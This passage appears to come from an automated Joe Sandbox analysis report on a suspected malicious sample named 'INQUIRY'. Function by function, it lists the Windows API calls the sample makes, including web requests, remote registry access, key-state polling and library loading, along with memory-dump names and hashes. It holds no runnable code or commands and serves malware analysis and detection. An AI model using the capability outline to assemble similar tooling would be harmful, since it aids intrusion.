                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A68F14
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A68F27
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A68F57
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 365058703-1403004172
                                                                                              • Opcode ID: 3bf5d691ab62327d874f95b9d986977be55f0acb7fff1163f50420c1077177cc
                                                                                              • Instruction ID: b13d062304a12d3430982728f069f6d7a7a020f66399675a7550b9dfadc7bcd2
                                                                                              • Opcode Fuzzy Hash: 3bf5d691ab62327d874f95b9d986977be55f0acb7fff1163f50420c1077177cc
                                                                                              • Instruction Fuzzy Hash: C1210171A04108BEDB14ABB0DC85DFFB7BDDF15360F10462AF421A71E0DF39484A9A10
                                                                                              Function 00A8182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8184C
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A81872
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A818A2
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00A818E9
                                                                                                • Part of subcall function 00A82483: GetLastError.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A82498
                                                                                                • Part of subcall function 00A82483: SetEvent.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A824AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: 474fc04eaee3521e1525548f358e06d89bb7c97f0d4f38ebc5025bc77890fa94
                                                                                              • Instruction ID: 15f634da4b6098aa45c5adaae3f71a3e6550cb8458ed5f404c6898ba0888a70e
                                                                                              • Opcode Fuzzy Hash: 474fc04eaee3521e1525548f358e06d89bb7c97f0d4f38ebc5025bc77890fa94
                                                                                              • Instruction Fuzzy Hash: 852180B1600208BFEB11ABA4DC86EBB7BEDEB48744F10412AF405D7140EB609D0657B1
                                                                                              Function 00A963E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
                                                                                                • Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
                                                                                                • Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91
                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A96461
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00A96468
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A9647D
                                                                                              • DestroyWindow.USER32(?), ref: 00A96485
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 4146253029-1011021900
                                                                                              • Opcode ID: 85e58f4a066b4ac2d674080a9cbfc5bee2290ce404be5bcfed443417cdb32074
                                                                                              • Instruction ID: f92fc7a9fd717b8f9993bcdf8a5af899736d3003a2064744916744b5fff80d4e
                                                                                              • Opcode Fuzzy Hash: 85e58f4a066b4ac2d674080a9cbfc5bee2290ce404be5bcfed443417cdb32074
                                                                                              • Instruction Fuzzy Hash: 44215B71300205BFEF108FA4DD84EBB77E9EF99764F148629FA2096190D7719C919760
                                                                                              Function 00A76D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00A76DBC
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A76DEF
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00A76E01
                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A76E3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: c57c43c315c2cd2ceb7094ea2825e887e86599be48a6c16a5b23b68ccb82b2c2
                                                                                              • Instruction ID: 6aab6cc012ff306d73f9ec16726de30491b8fdb38febcfd406444201fef98ffa
                                                                                              • Opcode Fuzzy Hash: c57c43c315c2cd2ceb7094ea2825e887e86599be48a6c16a5b23b68ccb82b2c2
                                                                                              • Instruction Fuzzy Hash: D8218175600A09AFDB309F69DC04B9A7BF4EF44720F20CA1AFDA4D72D1DB7099518B64
                                                                                              Function 00A76E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A76E89
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A76EBB
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A76ECC
                                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A76F06
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: 147719ec1065874dc33e89da5f3e3eadb8dfc0a3c6e9b5ad2eb6382a71fe3802
                                                                                              • Instruction ID: ed3f23fd0ad48945c4445d4d054fbd8902f6ed8ff2c925d264e8cf3546a82a5b
                                                                                              • Opcode Fuzzy Hash: 147719ec1065874dc33e89da5f3e3eadb8dfc0a3c6e9b5ad2eb6382a71fe3802
                                                                                              • Instruction Fuzzy Hash: 202190796007059BDB209F69DC04BAA77B8AF45720F20CA1AF9A8D72D0DB70A8518B61
                                                                                              Function 00A7AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A7AC54
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A7ACA8
                                                                                              • __swprintf.LIBCMT ref: 00A7ACC1
                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A9F910), ref: 00A7ACFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                              • String ID: %lu
                                                                                              • API String ID: 3164766367-685833217
                                                                                              • Opcode ID: 000b05206a816782631600f5d9d3aaa56828f9d122d91c6d3ff1a76d9f373a40
                                                                                              • Instruction ID: 63097592650d80ecfc19ec159617546f8457f0512bdac355574b14dd596c46c2
                                                                                              • Opcode Fuzzy Hash: 000b05206a816782631600f5d9d3aaa56828f9d122d91c6d3ff1a76d9f373a40
                                                                                              • Instruction Fuzzy Hash: 7A213035A00109BFCB10DFA5CE45DEE7BB8FF89714B108469F909DB252DA31EA45CB61
                                                                                              Function 00A71AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A71B19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                              • API String ID: 3964851224-769500911
                                                                                              • Opcode ID: 91a0ea55d3061b155e5f2b4585c5c7ba77baafb252af565324ff0d6e28ccffee
                                                                                              • Instruction ID: ee7ec8dc931569d88ad4d6fd980b6fa304b63b9346fcd9fbb64ea191eb6e5892
                                                                                              • Opcode Fuzzy Hash: 91a0ea55d3061b155e5f2b4585c5c7ba77baafb252af565324ff0d6e28ccffee
                                                                                              • Instruction Fuzzy Hash: 88115B319002088FCF00EFA8D9619EEB7F4FF65704F5084A9E819A7292EB325D06CB54
                                                                                              Function 00A8EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A8EC07
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A8EC37
                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A8ED6A
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A8EDEB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2364364464-0
                                                                                              • Opcode ID: b37d28ae3f59895528110170cd25f3e0d26706a69d8e44be975a0072963f2471
                                                                                              • Instruction ID: 8365a523d9592cc8df7ea5f146825a9f88debc123d3dbbd01baf40974c912e9c
                                                                                              • Opcode Fuzzy Hash: b37d28ae3f59895528110170cd25f3e0d26706a69d8e44be975a0072963f2471
                                                                                              • Instruction Fuzzy Hash: 43818F716043009FD720EF28C996F6BB7E5AF48710F14881DF999DB292DB74AC41CB91
                                                                                              Function 00A90037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A900FD
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9013C
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A90183
                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00A901AF
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A901BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3440857362-0
                                                                                              • Opcode ID: fd4ad3156b2c566e7f532eea9e684dd0fb6188b40ce8aa559bb153d5cae883b0
                                                                                              • Instruction ID: 2417e83342e5510eafbdf8493553e48ce287eedf089197b5809f6f4e2e4f9038
                                                                                              • Opcode Fuzzy Hash: fd4ad3156b2c566e7f532eea9e684dd0fb6188b40ce8aa559bb153d5cae883b0
                                                                                              • Instruction Fuzzy Hash: 06515C71208204AFDB04EF68C981EAEB7F9FF84354F50492DF595872A2DB31E945CB52
                                                                                              Function 00A8D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A8D927
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A8D9AA
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A8D9C6
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A8DA07
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A8DA21
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 327935632-0
                                                                                              • Opcode ID: 5dbf1a310d1fada2a9ba5aa792014c4343cc564d1f4e5fd8e42035abc4e185a0
                                                                                              • Instruction ID: 4358c8e65afabc117758f11e920fc6f3f4541bf68f3bdad7538b4f381a18e934
                                                                                              • Opcode Fuzzy Hash: 5dbf1a310d1fada2a9ba5aa792014c4343cc564d1f4e5fd8e42035abc4e185a0
                                                                                              • Instruction Fuzzy Hash: 8B513735A04209DFCB04EFA8C5849ADB7F8FF48310B148166E859AB362DB30ED85CF91
                                                                                              Function 00A7E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A7E61F
                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A7E648
                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A7E687
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A7E6AC
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A7E6B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1389676194-0
                                                                                              • Opcode ID: c8b9c36ff9f16d577efbf096ef5107bb4afbf3478282a6757e2f95881889b722
                                                                                              • Instruction ID: 0d89f74f19d1d8d131b91decd83de2b52cdf7b704d33d875cc76e1e8c37fe9e2
                                                                                              • Opcode Fuzzy Hash: c8b9c36ff9f16d577efbf096ef5107bb4afbf3478282a6757e2f95881889b722
                                                                                              • Instruction Fuzzy Hash: BB51FC35A00105DFCB01EF64CA91AAEBBF9EF49314F1480A9E849AB361CB31ED51DF55
                                                                                              Function 00A9A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3888178b67e1286621bee3e8358d4e22da68ee86759beb777f6cc5ed85fed03a
                                                                                              • Instruction ID: d57052076994c9efe67ea601fdb628ffab3a3e7931ada9d60076404e19874a60
                                                                                              • Opcode Fuzzy Hash: 3888178b67e1286621bee3e8358d4e22da68ee86759beb777f6cc5ed85fed03a
                                                                                              • Instruction Fuzzy Hash: 2F419235B05214AFDF10DB68DC88FA9BBE4EB19310F254267E916A72E1CB30AD41DA91
                                                                                              Function 00A12344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 00A12357
                                                                                              • ScreenToClient.USER32(00AD57B0,?), ref: 00A12374
                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00A12399
                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 00A123A7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                              • String ID:
                                                                                              • API String ID: 4210589936-0
                                                                                              • Opcode ID: e9b402a165b8aef983122f20f77e7d9525ddb0ae9cf8032183e214a8b5c51f78
                                                                                              • Instruction ID: b29126caee32004319022ad2050948c53ed66abb412f371ad4d86ac9261d1570
                                                                                              • Opcode Fuzzy Hash: e9b402a165b8aef983122f20f77e7d9525ddb0ae9cf8032183e214a8b5c51f78
                                                                                              • Instruction Fuzzy Hash: 2F416E39604119FFDF199F68C844BEDBB75BB45360F20431AF839962A0CB3499A4DBA1
                                                                                              Function 00A663AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A663E7
                                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00A66433
                                                                                              • TranslateMessage.USER32(?), ref: 00A6645C
                                                                                              • DispatchMessageW.USER32(?), ref: 00A66466
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A66475
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                              • String ID:
                                                                                              • API String ID: 2108273632-0
                                                                                              • Opcode ID: 64e42e2fc9d555c61c5bf0ac990594476dc24244fd2070f058a17fa79ac0a892
                                                                                              • Instruction ID: 0238bc4d37c192226acb81680424f13b1c7a20a0c36ea41f1a956362d41b2073
                                                                                              • Opcode Fuzzy Hash: 64e42e2fc9d555c61c5bf0ac990594476dc24244fd2070f058a17fa79ac0a892
                                                                                              • Instruction Fuzzy Hash: 9B31B471A01646AFDB24CFF0DD48BF67BBCAB01300F144566E426C61A1EF35988ADBA0
                                                                                              Function 00A68A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                              Download Yara Rule
